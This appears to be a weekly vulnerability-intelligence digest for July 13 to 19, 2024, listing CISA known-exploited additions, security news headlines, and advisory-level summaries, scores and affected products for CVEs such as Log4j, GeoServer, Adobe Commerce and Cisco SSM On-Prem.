Snapshot
July 13, 2024 - July 19, 2024
CISA Known Exploited Vulnerabilities |
||||
---|---|---|---|---|
CVE | Summary | Severity | Vendor | Date Added |
CVE-2024-34102 | Adobe Commerce and Magento Open Source contain an improper restriction of XML external entity reference (XXE) vulnerability that allows for remote code execution. | CRITICAL | Adobe | July 17, 2024 |
CVE-2024-28995 | SolarWinds Serv-U contains a path traversal vulnerability that allows an attacker access to read sensitive files on the host machine. | HIGH | SolarWinds | July 17, 2024 |
CVE-2022-22948 | VMware vCenter Server contains an incorrect default file permissions vulnerability that allows a remote, privileged attacker to gain access to sensitive information. | MEDIUM | VMware | July 17, 2024 |
CVE-2024-36401 | OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input. | CRITICAL | OSGeo | July 15, 2024 |
Newswires |
||||
Critical Cisco Vulnerability Allows Password Alterations
Cisco has issued a fix for a high-risk vulnerability, designated as CVE-2024-20419, that allows threat actors to modify any user or admin password. |
July 18, 2024 |
|||
SolarWinds Patches Eight Critical Vulnerabilities in Access Rights Manager Software
SolarWinds recently addressed eight critical vulnerabilities in its Access Rights Manager (ARM) software. |
July 18, 2024 |
|||
TAG-100: A New Cyber Threat Actor Leveraging Open-Source Tools for Global Attacks
A new cyber threat actor, known as TAG-100, has been discovered using open-source tools as part of a suspected global cyber espionage campaign. |
July 18, 2024 |
|||
Critical Vulnerability in Cisco SSM On-Prem Allows Hackers to Alter User Passwords
Cisco has addressed a critical vulnerability in its Cisco Smart Software Manager On-Prem (SSM On-Prem) license servers that allowed attackers to alter the passwords of any user, including those of administrators. |
July 17, 2024 |
|||
CISA Issues Warning on Active Exploitation of GeoServer GeoTools RCE Vulnerability
CISA has alerted about the active exploitation of a critical GeoServer GeoTools remote code execution vulnerability, identified as CVE-2024-36401. |
July 16, 2024 |
|||
Void Banshee APT Exploits Microsoft Zero-Day to Launch Spear-Phishing Attacks
The Void Banshee advanced persistent threat (APT) group has been exploiting a yet-to-be-patched Microsoft zero-day vulnerability, CVE-2024-38112, in a spear-phishing campaign to propagate the Atlantida Stealer malware. |
July 16, 2024 |
|||
HardBit Ransomware 4.0 Utilizes Passphrase Protection to Elude Detection
Cybersecurity experts have unearthed a new version of the ransomware strain known as HardBit. |
July 15, 2024 |
|||
Rapid Exploitation of PoC Exploits by Hackers: A Cloudflare Security Report
Cloudflare's 2024 Application Security report reveals an alarming trend: cybercriminals are weaponizing publicly available proof-of-concept (PoC) exploits in as little as 22 minutes after they're released. |
July 13, 2024 |
|||
Vulnerabilities In The News |
||||
CVE | Summary | Severity | Vendor | Risk Context |
CVE-2024-20419 (8) | A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem could allow an unauthenticated, remote ... | CRITICAL |
Actively Exploited |
|
CVE-2021-44228 (3) | Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect agai... | CRITICAL | Bentley, Sonicwall, Netapp, Apache, Intel, Siemens, Fedoraproject, Snowsoftware, Cisco, Debian, Percussion |
CISA Known Exploited Actively Exploited Remote Code Execution Used In Ransomware Public Exploits Available |
CVE-2024-20401 (5) | A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthent... | CRITICAL |
Remote Code Execution |
|
CVE-2024-36401 (5) | GeoServer is an open source server that allows users to share and edit geospatial data. | CRITICAL | Geotools, Geoserver, Osgeo |
CISA Known Exploited Actively Exploited Remote Code Execution Public Exploits Available |
CVE-2024-34102 (3) | Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML Extern... | CRITICAL | Adobe |
CISA Known Exploited Remote Code Execution Public Exploits Available |
CVE-2024-4577 (2) | In PHP versions 8.1. | CRITICAL | Php, Php Group, Fedoraproject |
CISA Known Exploited Actively Exploited Remote Code Execution Used In Ransomware Public Exploits Available |
CVE-2024-27198 (2) | In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible | CRITICAL | Jetbrains |
CISA Known Exploited Actively Exploited Remote Code Execution Used In Ransomware Public Exploits Available |
CVE-2021-40444 (2) | Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. |
HIGH | Microsoft |
CISA Known Exploited Actively Exploited Remote Code Execution Public Exploits Available |
CVE-2024-38112 (10) | Windows MSHTML Platform Spoofing Vulnerability | HIGH | Microsoft |
CISA Known Exploited Actively Exploited Remote Code Execution |
CVE-2024-28995 (3) | SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensit... | HIGH | Solarwinds |
CISA Known Exploited Actively Exploited Remote Code Execution Public Exploits Available |
CISA Known Exploited Vulnerabilities
CISA added four vulnerabilities to the known exploited vulnerabilities list.
OSGeo — GeoServer |
CVE-2024-36401 / Added: July 15, 2024 |
CRITICAL CVSS 9.80 EPSS Score 94.64 EPSS Percentile 99.28 |
OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input. |
Headlines
|
In The News
Vulnerabilities receiving the most attention in traditional news media.
CVE-2024-20419 |
CRITICAL CVSS 10.00 EPSS Score 0.04 EPSS Percentile 9.33 |
Actively Exploited |
Published: July 17, 2024 |
A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user. |
Quotes
|
Headlines
|
Back to top ↑ |
CVE-2021-44228 |
CRITICAL CVSS 10.00 EPSS Score 97.56 EPSS Percentile 100.00 |
CISA Known Exploited Actively Exploited Remote Code Execution Used In Ransomware Public Exploits Available |
Published: Dec. 10, 2021 |
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. |
Vendors Impacted: Bentley, Sonicwall, Netapp, Apache, Intel, Siemens, Fedoraproject, Snowsoftware, Cisco, Debian, Percussion |
Products Impacted: Prime Service Catalog, Cloud Connect, Cloudcenter Cost Optimizer, Crosswork Platform Infrastructure, Sentron Powermanager, Fedora, Packaged Contact Center Enterprise, Audio Development Kit, Data Center Network Manager, Crosswork Zero Touch Provisioning, Firepower 4115, Energy Engage, Vm Access Proxy, Dna Center, Nexus Insights, Unified Sip Proxy, Captial, Cloudcenter, Log4j2, Cloud Insights, E-Car Operation Center, Contact Center Domain Manager, Email Security, Dna Spaces\, Video Surveillance Operations Manager, Navigator, Sensor Solution Firmware Development Kit, Siguard Dsa, Workload Optimization Manager, Advanced Malware Protection Virtual Private Cloud Appliance, Evolved Programmable Network Manager, Siveillance Viewpoint, Firepower 4145, Mindsphere, Snapcenter, System Debugger, Common Services Platform Collector, Mendix, Spectrum Power 4, Unified Contact Center Express, Firepower 4140, Identity Services Engine, Ucs Central, Secure Device Onboard, Firepower 2130, Nx, Intersight Virtual Appliance,... |
Headlines |
Back to top ↑ |
CVE-2024-20401 |
CRITICAL CVSS 9.80 EPSS Score 0.04 EPSS Percentile 9.33 |
Remote Code Execution |
Published: July 17, 2024 |
A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system. This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device. Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition. |
Quotes
|
Headlines
|
Back to top ↑ |
CVE-2024-36401 |
CRITICAL CVSS 9.80 EPSS Score 94.64 EPSS Percentile 99.28 |
CISA Known Exploited Actively Exploited Remote Code Execution Public Exploits Available |
Published: July 1, 2024 |
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed. |
Vendors Impacted: Geotools, Geoserver, Osgeo |
Products Impacted: Geotools, Geoserver |
Quotes
|
Headlines
|
Back to top ↑ |
CVE-2024-34102 |
CRITICAL CVSS 9.80 EPSS Score 97.32 EPSS Percentile 99.89 |
CISA Known Exploited Remote Code Execution Public Exploits Available |
Published: June 13, 2024 |
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. |
Vendor Impacted: Adobe |
Products Impacted: Commerce Webhooks, Magento, Commerce, Commerce And Magento Open Source |
Quotes
|
Headlines |
Back to top ↑ |
CVE-2024-4577 |
CRITICAL CVSS 9.80 EPSS Score 96.75 EPSS Percentile 99.69 |
CISA Known Exploited Actively Exploited Remote Code Execution Used In Ransomware Public Exploits Available |
Published: June 9, 2024 |
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. |
Vendors Impacted: Php, Php Group, Fedoraproject |
Products Impacted: Php, Fedora |
Headlines |
Back to top ↑ |
CVE-2024-27198 |
CRITICAL CVSS 9.80 EPSS Score 97.16 EPSS Percentile 99.83 |
CISA Known Exploited Actively Exploited Remote Code Execution Used In Ransomware Public Exploits Available |
Published: March 4, 2024 |
In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible |
Vendor Impacted: Jetbrains |
Product Impacted: Teamcity |
Quotes
|
Headlines |
Back to top ↑ |
CVE-2021-40444 |
HIGH CVSS 8.80 EPSS Score 96.91 EPSS Percentile 99.74 |
CISA Known Exploited Actively Exploited Remote Code Execution Public Exploits Available |
Published: Sept. 15, 2021 |
Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs. Please see the Mitigations and Workaround sections for important information about steps you can take to protect your system from this vulnerability. UPDATE September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Sec...
|
Vendor Impacted: Microsoft |
Products Impacted: Windows Server 2022, Windows Server 2012, Windows Server 2019, Windows 10, Windows 8.1, Windows 7, Windows Server 2016, Windows Server 2008, Windows Rt 8.1, Mshtml |
Quotes
|
Headlines |
Back to top ↑ |
CVE-2024-38112 |
HIGH CVSS 7.50 EPSS Score 1.61 EPSS Percentile 87.60 |
CISA Known Exploited Actively Exploited Remote Code Execution |
Published: July 9, 2024 |
Windows MSHTML Platform Spoofing Vulnerability |
Vendor Impacted: Microsoft |
Products Impacted: Windows Server 2022, Windows 11 22h2, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2008, Windows 10 1607, Windows 10 22h2, Windows 11 23h2, Windows Server 2022 23h2, Windows 10 1809, Windows 10 1507, Windows, Windows 10 21h2, Windows 11 21h2 |
Quotes
|
Headlines
|
Back to top ↑ |
CVE-2024-28995 |
HIGH CVSS 7.50 EPSS Score 96.00 EPSS Percentile 99.51 |
CISA Known Exploited Actively Exploited Remote Code Execution Public Exploits Available |
Published: June 6, 2024 |
SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. |
Vendor Impacted: Solarwinds |
Product Impacted: Serv-U |
Quotes
|
Headlines |
Back to top ↑ |
Accelerate Security Teams
Schedule a free consultation with a vulnerability expert to discuss your use cases and to see a demo.